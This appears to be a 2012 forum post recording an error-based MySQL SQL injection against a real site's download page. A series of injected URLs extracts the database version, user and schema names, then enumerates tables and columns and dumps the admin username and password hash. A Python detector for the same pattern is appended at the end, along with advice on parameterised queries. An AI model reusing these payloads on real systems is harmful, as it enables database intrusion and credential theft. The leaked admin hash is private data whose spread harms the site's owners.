php+mysql advanced error-based injection, tested and confirmed working

Posted 2012-9-13 17:52:09
http://www.wooyun.org/bugs/wooyun-2010-01666

I had been looking for a case to test this on and did not expect to find one here. I was able to test it, so this is just a record.

http://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_003

/data0/htdocs/leqi_new/app/myapp.php

Or

/**********version()**********/ 5.1.49-log
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003

/**********user()**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003

/**********database()**********/  leqi
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003

/**********enumerating databases one at a time with limit**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
information_schema
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
leqi
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
test

/**********enumerating table names one at a time with limit**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
users

/**********enumerating column names one at a time with limit**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
user_id,username,nickname,passwd,group_id
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
/wapc/5000_0005_003
11 21
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
/wapc/5000_0005_003
11 341 351 361
/**********dumping data**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
admin
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
6a8b4574ca231eb8bd52764d4978ffcd
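Seen from the defending side, every request recorded in the post has the same shape: floor(rand(0)*2) concatenated with a subselect, inside a count(*) ... group by over information_schema. The following Python detection logic is an added example, not part of the original post: it flags that shape in access-log request lines and recognises the MySQL duplicate-key error that carries the leaked value. The function names, log lines, paths and the sample error string are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Request-side signals of the duplicate-key error technique the post records.
SIGNALS = {
    "rand_floor": re.compile(r"floor\s*\(\s*rand\s*\(\s*\d*\s*\)\s*\*\s*2\s*\)"),
    "count_group_by": re.compile(r"count\s*\(\s*\*\s*\).*group\s+by"),
    "information_schema": re.compile(r"information_schema\s*\.\s*\w+"),
    "concat_subselect": re.compile(r"concat\s*\(.*\(\s*select\b"),
}
# Response-side signal: the MySQL error 1062 text that echoes the grouped value.
DUP_KEY_ERROR = re.compile(r"Duplicate entry '(.*?)' for key '<?group_key>?'")
REQUEST_LINE = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')

def normalize(target):
    """Decode twice (double encoding), drop /**/ comments, fold case and spaces."""
    text = unquote_plus(unquote_plus(target))
    text = re.sub(r"/\*.*?\*/", " ", text, flags=re.S)
    return re.sub(r"\s+", " ", text).lower()

def signals(target):
    text = normalize(target)
    return sorted(name for name, rx in SIGNALS.items() if rx.search(text))

def is_suspicious(target):
    hits = signals(target)  # rand/floor alone is weak: require one more signal
    return "rand_floor" in hits and len(hits) >= 2

def scan_access_log(lines):
    """Return (line_number, signals) for every flagged request line."""
    flagged = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_LINE.search(line)
        if match and is_suspicious(match.group(1)):
            flagged.append((number, signals(match.group(1))))
    return flagged

def leaked_value(body):
    """Value echoed in a MySQL duplicate-key error in a response body, or None."""
    match = DUP_KEY_ERROR.search(body)
    return match.group(1) if match else None

# Constructed sample input (hypothetical paths, documentation IP address).
SAMPLE_LOG = [
    '203.0.113.9 - - [13/Sep/2012:17:40:01 +0800] "GET /item/id/7 HTTP/1.1" 200 512',
    '203.0.113.9 - - [13/Sep/2012:17:40:09 +0800] "GET /search?q=floor+plan+rand+group+by+price HTTP/1.1" 200 900',
    '203.0.113.9 - - [13/Sep/2012:17:41:30 +0800] "GET /item/id/7\'+or+1=(select+1+from+(select+count(*),concat((select+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23 HTTP/1.1" 500 230',
]
SAMPLE_ERROR = "Duplicate entry '5.1.49-log1' for key 'group_key'"  # constructed
```

The response-side check matters because the technique only yields data when the application prints database errors; binding the id value as a query parameter and keeping MySQL error text out of HTTP responses removes both halves of it.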